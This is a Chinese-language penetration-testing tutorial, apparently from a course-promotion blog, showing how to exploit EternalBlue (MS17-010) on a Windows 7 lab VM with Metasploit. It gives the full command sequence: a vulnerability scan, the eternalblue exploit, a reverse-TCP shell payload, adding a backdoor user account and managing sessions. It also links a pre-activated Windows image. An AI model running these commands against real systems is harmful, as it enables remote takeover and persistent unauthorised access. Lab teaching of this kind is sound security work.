环境介绍

永恒之蓝概述:

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

官方描述:

永恒之蓝相关病毒,其实是利用了微软的MS17-010漏洞。MS17-010是Windows系统一个底层服务的漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

视频版↓: 网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套课程-小白入门到精通

文字版↓: 做过的实战项目-内网实战靶场环境-渗透工具”还有很多渗透思维图谱!

通过msf模块获取Win7主机远程shell

Win7旗舰版SP1-64位系统镜像(内有激活工具): 链接:https://pan.baidu.com/s/1FueCa5Z9WUBbOWvL-Djwqw 提取码:root

Win7旗舰版SP1-64位免安装版(已激活)密码:123456,下载解压后用VMware直接打开即可 链接:https://pan.baidu.com/s/1vlHNmdHBiPoidRmP5H7sHw 提取码:4g96

如果想自己安装可以下载镜像,不想自己安装的可以下载免安装版

模块的整体使用流程如下

在这里插入图片描述

我们先扫描目标是否存在ms17-010漏洞

msf6 > search ms17-010

在这里插入图片描述

使用use命令选中这个模块

msf6 > use auxiliary/scanner/smb/smb_ms17_010

查看模块需要配置的信息

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

在这里插入图片描述

需要我们配置RHOST主机IP
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.56

开始扫描

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

在这里插入图片描述

目标看起来易受攻击,也就表示可能存在相关漏洞。

查找攻击模块

msf6 > search ms17-010

在这里插入图片描述

使用use命令加载模块

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

在这里插入图片描述

设置目标主机IP

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.56

查看exploit target目标类型:

msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets

在这里插入图片描述

可以看到这个模块只有一个target,所以默认就选择这个目标系统。不需要手动设置。

我们已经配置好漏洞相关参数了,接下来应该做什么?

在这里插入图片描述

找一个payload,获取shell远程连接权限后,进行远程执行命令,由于模块加载的时候默认指定了一个payload

在这里插入图片描述

如果不想使用默认指定的payload,可以自己找一个payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell type:payload

注:payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。

我们挑选一个反弹shell的payloads

在这里插入图片描述

注:设置的时候payload和windows之间有空格。

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp

查看一下payloads需要配置什么信息

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options  #查看加载到的payload信息

在这里插入图片描述

设置一下本机payload监听地址

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.53

配置完成后开始执行

exploit  [ɪkˈsplɔɪt  运用;利用; 
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

在这里插入图片描述

注:如果等待没有出现shell提示符可以敲一下回车。 直接执行的话会获得目标主机的SEHLL 使用DOS命令创建用户

C:\Windows\system32>net user admin admin /add 

在这里插入图片描述

显示乱码但是已经添加成功 拓展:解决乱码问题(乱码是因为windows和linux的编码不一样导致的)

C:\Windows\system32>chcp 65001

查看用户

C:\Windows\system32>net user

在这里插入图片描述

可以看到新建的用户已经创建成功。 查看拿到的用户权限

C:\Windows\system32>whoami

在这里插入图片描述

关闭链接Ctrl+c

Abort session 1? [y/N]  y

实战:通过会话进行连接目标机

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j 

-j表示后台执行 渗透目标完成后会创建一个session 我们可以通过session连接目标主机。

在这里插入图片描述

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions

在这里插入图片描述

通过会话Id进入会话

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2

在这里插入图片描述

退出会话将会话保存到后台

C:\Windows\system32>background

在这里插入图片描述

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions 

在这里插入图片描述

根据会话Id结束会话

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2

在这里插入图片描述

总结使用metasploit攻击的步骤:

1、查找CVE公布的漏洞

2、查找对应的exploit模块

3、配置模块参数

4、添加payload后门

5、执行exploit开始攻击

今天的分享就到这里,需要配套资料的找小编

在这里插入图片描述